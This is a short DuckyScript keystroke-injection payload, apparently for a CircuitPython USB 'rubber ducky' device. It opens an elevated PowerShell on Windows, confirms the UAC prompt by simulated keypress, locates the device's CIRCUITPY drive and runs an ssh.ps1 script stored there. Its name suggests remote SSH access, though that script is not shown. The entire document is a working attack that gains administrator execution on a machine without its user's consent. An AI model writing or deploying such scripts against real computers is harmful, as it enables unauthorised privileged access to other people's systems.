REM PowerShell Admin Ducky Script
DELAY 5000
REM Press Windows key to open the Start menu
GUI
DELAY 500
REM Type "powershell" to search for PowerShell
STRING powershell
DELAY 500
REM Press Enter to select the PowerShell application
RIGHTARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER
DELAY 1000
LEFTARROW
DELAY 1000
ENTER
REM Press Alt+Y to allow execution of the script (UAC prompt)
ALT y
DELAY 500

REM Get the drive letter of CIRCUITPY and store it in a variable
STRING $driveLetter = (Get-Volume | Where-Object { $_.FileSystemLabel -eq "CIRCUITPY" }).DriveLetter
ENTER
DELAY 1000
STRING $path = "$driveLetter" + ":" + "\SSHDucky"
ENTER
DELAY 100

STRING cd $path
ENTER

STRING .\ssh.ps1
ENTER
DELAY 5000